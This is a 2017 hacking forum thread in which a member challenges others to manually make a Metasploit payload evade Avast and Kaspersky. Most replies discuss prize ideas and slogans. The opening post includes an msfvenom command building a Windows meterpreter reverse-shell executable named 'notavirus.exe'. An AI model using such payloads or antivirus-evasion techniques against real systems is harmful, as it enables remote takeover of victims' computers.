October 23, 2017, 06:37:48 AM
Welcome, Guest. Please login or register.

When in doubt...WPS!

Author Topic: Fooling antivirus  (Read 4856 times)

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Fooling antivirus
« on: February 15, 2017, 05:16:29 PM »
Here's a challenge:

Code: [Select]
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -f exe -a x86 --platform windows -o notavirus.exe

Challenge 1: Bypass Avast
Challenge 2: Bypass Kaspersky

Download links are in the names.

For the challenges, you should download the antivirus software. After doing so, fully update it to the latest definitions.

Rules:
  • Don't use any automatic tools such as veil, etc
  • Anything that automates the process for you, don't use it
  • See above

After you are done, pm the steps you took to do so that way no cheaters will cheat :)

Note to self: to be a cheater, one must actually participate. Not just click here, read, then leave like most of you do
The quieter you become, the more you are unlikely to sound stupid.

Offline Amonsec

  • Top Hat Member
  • Prospect
  • ********
  • Posts: 49
  • Internets: +36/-0
  • 1336 working to become 1337
Re: Fooling antivirus
« Reply #1 on: February 16, 2017, 02:08:01 AM »
Challenge accepted!   :)
That can be fun.
"A computer is only as good as it's user" - R4V3N
OSCP (2017)

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #2 on: February 16, 2017, 06:20:30 PM »
Let's up the anti shall we?
200 internets (forum likes/karma) for the 1st person who solves this challenge
100 interents for the 2nd
50 for the 3rd
25 for the 4th
10 for the 5th

Ohhh unless we can do medals or something... that would be fun. GBM or H4 think you could look into that and see if we could do something like that?
A computer is only as strong as its user! -R4v3n

Offline Gingerbread Man

  • *High Tech Low-life*
  • Administrator
  • Elite
  • *****
  • Posts: 935
  • Internets: +93/-0
Re: Fooling antivirus
« Reply #3 on: February 17, 2017, 08:21:14 AM »
YES!
I could also put up a pi zero

That is very generous of you Ch3rn...Thank you very much.

It is a little short notice for 'medals' Galaxy (you mean like challenge coins or enamel pins right?) but I bet we could cook up a few of the embroidered patches with the 'new' logo...



Gave away more than a few at Defcon and they were a hit...;)

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1249
  • Internets: +193/-0
Re: Fooling antivirus
« Reply #4 on: February 17, 2017, 01:43:36 PM »
you and your dam shellcode dude...



Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #5 on: February 20, 2017, 07:40:58 PM »
YES!
I could also put up a pi zero

That is very generous of you Ch3rn...Thank you very much.

It is a little short notice for 'medals' Galaxy (you mean like challenge coins or enamel pins right?) but I bet we could cook up a few of the embroidered patches with the 'new' logo...

Gave away more than a few at Defcon and they were a hit...;)

I was actually talking about forum medals (I have seen different ones on different sites when I used to have a bit more time on my hands) rather than physical medals or patches. But hey, I am all for either way if you want to handle the production/shipping. Will send a pm. Though personally, that isn't MY favorite catch phrase  ;)
Man I wish I had more time!
A computer is only as strong as its user! -R4v3n

Offline Gingerbread Man

  • *High Tech Low-life*
  • Administrator
  • Elite
  • *****
  • Posts: 935
  • Internets: +93/-0
Re: Fooling antivirus
« Reply #6 on: February 21, 2017, 07:24:38 AM »
... Though personally, that isn't MY favorite catch phrase  ;) ...

Then you must REALLY hate the runner up: "Top-Hat-Sec: Monocles and Shit"...

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #7 on: February 23, 2017, 05:56:33 AM »
... Though personally, that isn't MY favorite catch phrase  ;) ...

Then you must REALLY hate the runner up: "Top-Hat-Sec: Monocles and Shit"...

Hmmm... well I do like "Top-Hat-Sec: A Computer is Only As Strong As It's User"

« Last Edit: February 23, 2017, 05:59:19 AM by GalaxyNinja »
A computer is only as strong as its user! -R4v3n

Offline ch3rn0byl

  • Top Hat Member
  • Experienced
  • ********
  • Posts: 187
  • Internets: +1337/-0
  • Grumpy Old Man with Mounds of Salt
Re: Fooling antivirus
« Reply #8 on: February 23, 2017, 09:33:52 AM »
... Though personally, that isn't MY favorite catch phrase  ;) ...

Then you must REALLY hate the runner up: "Top-Hat-Sec: Monocles and Shit"...

Hmmm... well I do like "Top-Hat-Sec: A Computer is Only As Strong As It's User"



Guys, I wouldn't plan on anything. So far, this post has 1146 views. That's 1,146 people that came here and saw the dreaded word "challenge ". Then they saw the next couple words "no automation". That combination of words scare the shit out of people for whatever reason

The quieter you become, the more you are unlikely to sound stupid.

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #9 on: February 23, 2017, 07:30:06 PM »

Guys, I wouldn't plan on anything. So far, this post has 1146 views. That's 1,146 people that came here and saw the dreaded word "challenge ". Then they saw the next couple words "no automation". That combination of words scare the shit out of people for whatever reason


Well I still think it is a cool idea for future stuff even if people don't rise to this specific challenge.  We will see... maybe they are just working on it!
A computer is only as strong as its user! -R4v3n

Offline Gingerbread Man

  • *High Tech Low-life*
  • Administrator
  • Elite
  • *****
  • Posts: 935
  • Internets: +93/-0
Re: Fooling antivirus
« Reply #10 on: February 27, 2017, 10:08:23 AM »

... That combination of words scare the shit out of people for whatever reason


Well I still think it is a cool idea for future stuff even if people don't rise to this specific challenge.  We will see... maybe they are just working on it!

Perhaps we should have the 'challenges' organized like "Hackthissite" or "Overthewire"...Have the answers not publicly posted, but have the puzzles persistently (and prominently) featured on the main forum index...

Give the members some other metric besides the more general 'internets' to track their progress through the 'Challenge Board"...

That way we can generate some 'low hanging fruit' to help prime the pump...get folks some wins under their belt...

Just a thought...

And, no need to fret Galaxy...the *Official* slogan will ALWAYS be "A Computer is only as strong as its user" (no apostrophe...I swear...some of us  have been fighting about that little detail since the "1336" shirts were made ;) )

We just want to liven up the merch for those of us who are willing to walk on the wild side...;)

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1728
  • Internets: +96/-0
  • My password is **********
Re: Fooling antivirus
« Reply #11 on: February 28, 2017, 04:54:12 AM »
Perhaps we should have the 'challenges' organized like "Hackthissite" or "Overthewire"...Have the answers not publicly posted, but have the puzzles persistently (and prominently) featured on the main forum index...

Give the members some other metric besides the more general 'internets' to track their progress through the 'Challenge Board"...

That way we can generate some 'low hanging fruit' to help prime the pump...get folks some wins under their belt...

Just a thought...

And, no need to fret Galaxy...the *Official* slogan will ALWAYS be "A Computer is only as strong as its user" (no apostrophe...I swear...some of us  have been fighting about that little detail since the "1336" shirts were made ;) )

We just want to liven up the merch for those of us who are willing to walk on the wild side...;)

Sounds like a plan to me!

Hah, yeah, it is a plan for its.  ;)
And I'm a grammar police too. Guess that is what happens when I start running on 4 hrs sleep per night.

I wasn't trying to be rude or anything... just having a little fun with the drop the mic.  ;D
As long as R4v3n is cool with it, then I am cool with it (which he is). :)
A computer is only as strong as its user! -R4v3n